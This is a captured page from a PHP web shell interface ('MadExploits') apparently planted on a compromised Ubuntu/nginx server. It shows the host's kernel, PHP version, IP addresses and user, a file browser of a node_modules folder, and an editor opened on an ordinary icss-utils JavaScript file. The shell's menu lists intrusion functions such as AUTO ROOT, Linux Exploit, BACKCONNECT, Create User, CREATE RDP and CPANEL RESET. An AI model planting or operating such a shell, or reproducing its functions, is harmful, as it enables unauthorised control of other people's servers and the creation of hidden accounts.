Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
icss-utils /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
createICSSRules.js
1.55
KB
-rw-r--r--
extractICSS.js
1.19
KB
-rw-r--r--
index.js
1.04
KB
-rw-r--r--
replaceSymbols.js
692
B
-rw-r--r--
replaceValueSymbols.js
583
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : extractICSS.js
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var importPattern = /^:import\(("[^"]*"|'[^']*'|[\w-\.]+)\)$/; var getDeclsObject = function getDeclsObject(rule) { var object = {}; rule.walkDecls(function (decl) { object[decl.raws.before.trim() + decl.prop] = decl.value; }); return object; }; var extractICSS = function extractICSS(css) { var removeRules = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : true; var icssImports = {}; var icssExports = {}; css.each(function (node) { if (node.type === "rule") { if (node.selector.slice(0, 7) === ":import") { var matches = importPattern.exec(node.selector); if (matches) { var path = matches[1]; var aliases = Object.assign(icssImports[path] || {}, getDeclsObject(node)); icssImports[path] = aliases; if (removeRules) { node.remove(); } } } if (node.selector === ":export") { Object.assign(icssExports, getDeclsObject(node)); if (removeRules) { node.remove(); } } } }); return { icssImports, icssExports }; }; exports.default = extractICSS;
Close